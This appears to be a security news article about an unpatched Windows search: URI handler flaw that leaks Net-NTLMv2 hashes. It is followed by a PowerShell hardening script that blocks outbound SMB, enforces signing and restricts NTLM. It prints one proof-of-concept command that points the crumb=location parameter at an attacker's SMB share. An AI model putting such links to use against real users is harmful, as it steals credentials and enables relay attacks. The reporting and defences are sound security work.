June 3, 2026
Ravie Lakshmanan | Jun 03, 2026 | Vulnerability / Network Security

Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to leak a user's NTLMv2 hash to an attacker.

As in the case of CVE-2026-33829, which affected the Windows Snipping Tool's ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress.

CVE-2026-33829 refers to a spoofing vulnerability that could expose sensitive information to an unauthorized actor. It was patched by Microsoft in April 2026.

"An attacker could induce the user into clicking a specially crafted link in a Web browser or other URL source, by embedding it in a Web page or email message," Microsoft noted in its advisory at the time.

"If the user approves the launching of the link, the crafted URL can induce the computer to connect to an SMB server of the attacker's choosing, which could disclose the user's NTLMv2 hash to the attacker, who could use this to authenticate as the user."

Specifically, the problem had to do with the fact that the Snipping Tool's URI handler accepted a "filePath" parameter, did not validate it, and would reach out to any Universal Naming Convention (UNC) path passed to it. This, in turn, could trigger NTLM authentication and expose the victim's Net-NTLMv2 hash to the attacker.

The newly discovered shortcoming achieves the same end goal using "search:" and "crumb=location:" instead of "filePath", with a command like the one below –

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

"It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating," Huntress researcher Andrew Schwartz said. It's worth noting that the use of a "crumb" parameter to steal the hash (CVE-2023-35636) was documented by Varonis in February 2024.

As a result, a threat actor could leverage the captured hash to conduct relay attacks and gain deeper access into a network. Following responsible disclosure on April 15, 2026, Microsoft declined to address the issue, stating "only Important and Critical severity cases meet our bar for servicing."

In the absence of a fix, it is recommended to block outbound SMB (TCP/445 and TCP/139) on hosts that do not need it, enforce SMB signing so that captured hashes cannot be relayed against internal services, and disable NTLM where applicable.
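One way to apply those three mitigations on a single Windows host, as an added PowerShell example that is not part of the Huntress research or this article; the firewall rule name and the choice to start NTLM restriction in audit mode are this example's own assumptions, and the script must run elevated.

```powershell
# Added hardening example (not from the article or from Huntress). Run elevated.
# Rule name and the audit-first NTLM setting are this example's choices.
#Requires -RunAsAdministrator

# 1. Block outbound SMB so a crafted search:/UNC link cannot reach an
#    attacker-controlled server on TCP 445/139. Skip on hosts that need SMB.
$ruleName = 'Block outbound SMB (NTLM leak mitigation)'
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Outbound -Protocol TCP `
        -RemotePort 445,139 -Action Block -Profile Any | Out-Null
}

# 2. Require SMB signing on both client and server so a captured
#    Net-NTLMv2 response cannot be relayed to internal SMB services.
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

# 3. Restrict outgoing NTLM. 1 = audit only (would-be blocks are logged as
#    event 8001 in Microsoft-Windows-NTLM/Operational); change to 2 to deny
#    once the audit log shows no legitimate NTLM dependencies remain.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
Set-ItemProperty -Path $lsa -Name 'RestrictSendingNTLMTraffic' -Value 1 -Type DWord

# Verify the resulting state on this host.
[pscustomobject]@{
    OutboundSmbBlocked = [bool](Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)
    ClientSigning      = (Get-SmbClientConfiguration).RequireSecuritySignature
    ServerSigning      = (Get-SmbServerConfiguration).RequireSecuritySignature
    NtlmOutgoing       = (Get-ItemProperty -Path $lsa).RestrictSendingNTLMTraffic
} | Format-List

# Review audited outbound NTLM attempts recorded since the change; a hit
# against an unexpected remote host is what a leaked-hash attempt looks like.
Get-WinEvent -LogName 'Microsoft-Windows-NTLM/Operational' `
    -FilterXPath '*[System[EventID=8001]]' -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message
```

In a domain, the same settings are normally pushed by Group Policy (the "Restrict NTLM" and "Digitally sign communications" security options) rather than set per host.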


